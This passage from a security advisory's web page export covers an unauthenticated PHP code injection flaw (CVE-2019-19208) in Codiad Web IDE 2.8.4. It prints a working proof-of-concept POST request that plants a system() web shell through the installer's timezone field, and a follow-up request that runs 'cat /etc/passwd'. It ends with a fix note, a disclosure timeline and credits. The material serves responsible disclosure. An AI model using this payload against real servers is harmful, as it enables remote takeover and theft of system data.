Request or send the following payload:<\/span><\/p>\n[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]POST \/components\/install\/process.php HTTP\/1.1
\nHost: codiad.local
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nDNT: 1
\nContent-type: application\/x-www-form-urlencoded
\nConnection: close
\nUpgrade-Insecure-Requests: 1
\nCache-Control: max-age=0
\nContent-Length: 170<\/p>\n
path=\/var\/www\/html\/data&username=\/tmp\/dada&password=\/tmp\/dada&project_name=\/tmp\/dada&project_path=\/var\/www\/html\/data\/data&timezone='\")%3b+system($_GET[\"cmd\"])%3b+print(\"'<\/code><\/pre>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n
Now you can inject system commands via the <\/span>GET<\/b> parameter \u201e<\/span>cmd<\/tt>\u201c like this:<\/span><\/p>\n[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]http:\/\/codiad.local\/data\/config.php?cmd=cat \/etc\/passwd<\/code><\/pre>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n
Please note that this is also possible after the initial configuration by specifying a project path that does exists but was not used before.<\/span><\/p>\n[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n
\n
\n
Fix<\/h3>\n
Properly filter input that is written to PHP file.<\/span><\/p>\n<\/h3>\nTimeline<\/h3>\n\n- 2019-07-16 Tobias Neitzel discovered the bug<\/li>\n
- 2019-08-05 First contact attempt via GitHub issue<\/li>\n
- 2019-10-30 Second contact attempt via https:\/\/fluidbyte.github.io\/<\/li>\n
- 2020-02-05 Security advisory released<\/li>\n<\/ul>\n
<\/h3>\nCredits<\/h3>\n
This security vulnerability was found by Tobias Neitzel of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
usd-2019-0049 | Codiad Web IDE Advisory ID: usd-2019-0049CVE Number: CVE-2019-19208Affected Product: Codiad Web IDEAffected Version: v.2.8.4Vulnerability Type: PHP Code injectionSecurity Risk: Critical \u2013 Remote Code Execution (RCE)Vendor URL: http:\/\/codiad.com\/Vendor Status: Not fixed Description An unauthenticated attacker can inject PHP code that gets executed and therefore he can run arbitrary system commands on the server. Proof […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16621","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16621","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16621"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16621\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16621"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}